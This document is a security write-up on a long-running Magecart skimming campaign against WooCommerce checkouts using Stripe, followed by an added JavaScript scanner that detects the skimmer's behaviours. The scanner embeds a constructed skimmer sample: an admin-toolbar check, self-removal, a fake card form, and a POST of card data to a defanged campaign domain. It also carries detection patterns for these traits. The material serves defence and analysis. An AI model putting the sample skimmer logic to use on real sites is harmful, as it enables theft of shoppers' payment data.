
Web Skimming Attack Campaign

Cybersecurity researchers have uncovered a large-scale web skimming campaign that has remained active since January 2022. The operation targets enterprise organizations that rely on major payment networks, including American Express, Diners Club, Discover, JCB Co., Ltd., Mastercard, and UnionPay. Companies that integrate these payment services into their online checkout systems are assessed to be at the highest risk.

Digital Skimming and the Evolution of Magecart

Digital skimming attacks are a form of client-side compromise in which threat actors inject malicious JavaScript into legitimate e-commerce sites and payment portals. The injected code silently harvests credit card data and personal information as customers enter their payment details.

This activity falls under the broader category commonly known as Magecart. The term originally described a loose collection of cybercriminal groups focused on Magento-based e-commerce sites, but it has since expanded to cover skimming operations across many platforms and technologies.

Infrastructure Tied to Sanctions Evasion

The campaign was identified during an investigation into a suspicious domain associated with Stark Industries, a bulletproof hosting provider that has been sanctioned. Its parent company, PQ.Hosting, later rebranded the service as THE.Hosting, now operated by the Dutch entity WorkTitans B.V., reportedly as a way to evade sanctions.

The domain cdn-cookie(dot)com was found hosting heavily obfuscated JavaScript files such as 'recorder.js' and 'tab-gtm.js', filenames and a hostname chosen to resemble ordinary tag-manager and cookie-consent assets. These scripts were embedded into compromised online shops, where they performed covert credit card skimming.

Stealth Through Self-Destruction and Environmental Awareness

The skimmer was engineered to evade detection by site administrators. It inspects the Document Object Model for an element with the id 'wpadminbar', the toolbar WordPress renders only when an administrator or other privileged user is logged in. If that element is present, the skimmer immediately runs a self-removal routine that deletes its own script element from the page, so an operator inspecting the DOM of a checkout page sees nothing unusual.

For ordinary shoppers, the skimmer re-attempts execution every time the page's DOM changes. On a modern checkout page the DOM changes constantly as the customer interacts with it, so the skimmer is effectively re-armed throughout the session without needing a separate persistence mechanism.

Weaponizing Stripe with Interface Manipulation

The malicious code contains logic specific to Stripe-based checkout flows. When Stripe is selected as the payment method, the skimmer checks for a localStorage entry named 'wc_cart_hash'. The name resembles a key that WooCommerce's own front-end scripts use for cart data, so it does not stand out in browser storage. If the entry does not exist, the skimmer creates it and prepares to harvest data.

At that point, the malware dynamically replaces the legitimate Stripe payment form with a counterfeit one. This step is necessary because a genuine Stripe Elements form keeps card fields inside Stripe-hosted iframes that page scripts cannot read; the fake form gives the skimmer plain inputs it controls. Through subtle interface manipulation, victims are deceived into entering their card number, expiration date, and CVC into the fake form.

After submission, the skimmer displays an error message, making it appear as though the payment failed because of mistyped card details rather than malicious interference.

Data Theft, Exfiltration, and Cleanup

The stolen information goes beyond payment card details and includes full names, phone numbers, email addresses, and shipping addresses. The skimmer transmits this data via an HTTP POST request to lasorie(dot)com.

Once the exfiltration process is complete, the malware removes the fake form, restores the legitimate Stripe interface so the genuine checkout can proceed, and deletes traces of its activity from the checkout page. It then sets 'wc_cart_hash' to 'true', ensuring the skimmer does not run a second time in the same browser.
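The attack chain above (admin-bar check, self-removal, re-entry on DOM changes, the 'wc_cart_hash' run-once flag, Stripe form replacement, and exfiltration to the named host) gives a defender a concrete set of behaviours to look for in scripts served on a checkout page. The following is an added example, not the campaign's code and not a tool from the researchers: a static indicator scan that scores a script's source against those behaviours and lists the hosts it references, so it can be compared with the shop's expected third parties. The two sample scripts are constructed for this demonstration (a generic tag-manager loader and a deobfuscated stand-in for the skimmer's logic), the indicator weights and the verdict threshold are this example's own assumptions, and the campaign domains are kept defanged in the source and restored only for matching.

```javascript
// Added example: static indicator scan for the skimmer behaviour described in
// the write-up. Not the campaign's code and not a vendor tool.
// Run with: node scan.js

// Hosts named in the write-up, kept defanged; refang() restores dots for matching.
const refang = (s) => s.replace(/\(dot\)|\[\.\]/g, ".");
const KNOWN_HOSTS = ["cdn-cookie(dot)com", "lasorie(dot)com"].map(refang);
const KNOWN_HOST_RE = new RegExp(KNOWN_HOSTS.map((h) => h.replace(/\./g, "\\.")).join("|"), "i");

// One indicator per behaviour in the attack chain. Weights are an assumption of
// this example, not a published scoring.
const INDICATORS = [
  { id: "admin_bar_check", weight: 2, re: /wpadminbar/,
    note: "looks for the WordPress admin toolbar (operator evasion)" },
  { id: "self_removal", weight: 2, re: /currentScript\s*\.\s*remove\s*\(/,
    note: "removes its own <script> element" },
  { id: "dom_mutation_hook", weight: 1, re: /MutationObserver|DOMSubtreeModified|DOMNodeInserted/,
    note: "re-enters on DOM changes" },
  { id: "cart_hash_gate", weight: 1, re: /localStorage[\s\S]{0,60}?wc_cart_hash/,
    note: "run-once flag disguised as a WooCommerce storage key" },
  { id: "stripe_targeting", weight: 1, re: /stripe/i,
    note: "references the Stripe checkout (legitimate integrations match too)" },
  { id: "card_field_capture", weight: 1, re: /\b(?:cvc|cvv|card[_-]?number)\b/i,
    note: "handles raw card fields, which the merchant page never sees with Stripe Elements" },
  { id: "known_host", weight: 3, re: KNOWN_HOST_RE,
    note: "contacts a host tied to this campaign" },
];

// Scores one script's source. Returns the indicators hit, the total weight,
// every http(s) host referenced, and a verdict (threshold is an assumption).
function scanScript(source) {
  const src = refang(source);
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    if (ind.re.test(src)) { hits.push(ind.id); score += ind.weight; }
  }
  const hosts = [...new Set([...src.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map((m) => m[1].toLowerCase()))];
  const verdict = score >= 6 ? "likely skimmer" : score >= 3 ? "review" : "clean";
  return { score, hits, hosts, verdict };
}

// Constructed sample: an ordinary tag-manager loader (container id is a placeholder).
const BENIGN_SAMPLE = `
(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXX');
`;

// Constructed, deobfuscated stand-in for the behaviour the write-up describes.
// It is a string that is scanned, never executed, and is not the real recorder.js.
const SKIMMER_SAMPLE = `
(function () {
  if (document.getElementById('wpadminbar')) { document.currentScript.remove(); return; }
  new MutationObserver(run).observe(document.documentElement, { childList: true, subtree: true });
  function run() {
    if (!document.querySelector('#payment_method_stripe:checked')) return;
    if (localStorage.getItem('wc_cart_hash') !== null) return;
    localStorage.setItem('wc_cart_hash', '');
    var real = document.querySelector('.StripeElement');
    var fake = document.createElement('div');
    fake.innerHTML = '<input name=cc><input name=exp><input name=cvc>';
    real.style.display = 'none';
    real.parentNode.insertBefore(fake, real);
    fake.onchange = function () {
      var d = { cc: fake.children[0].value, exp: fake.children[1].value, cvc: fake.children[2].value };
      fetch('https://lasorie(dot)com/', { method: 'POST', body: JSON.stringify(d) });
      fake.remove(); real.style.display = '';
      localStorage.setItem('wc_cart_hash', 'true');
    };
  }
})();
`;

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, src] of [["tag-manager", BENIGN_SAMPLE], ["skimmer", SKIMMER_SAMPLE]]) {
    console.log(name, JSON.stringify(scanScript(src)));
  }
}
```

The indicators deliberately mix generic behaviours (Stripe references, card field names) with ones that are hard to explain on a legitimate page (an admin-bar check followed by self-removal, a POST to a host the shop never integrated). The host list is the part worth acting on first: any script on the checkout page that references a hostname outside the shop's known payment, analytics and CDN providers deserves a look regardless of score, and the real 'recorder.js' is obfuscated, so the regexes here should be run on a deobfuscated copy rather than the file as served.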

An Attack Chain Built on Deep Platform Knowledge

Researchers note that the threat actor demonstrates an advanced understanding of WordPress internals and leverages even lesser-known platform features as part of the attack flow. This depth of knowledge, combined with sophisticated evasion and interface manipulation techniques, underscores the maturity and persistence of the operation.
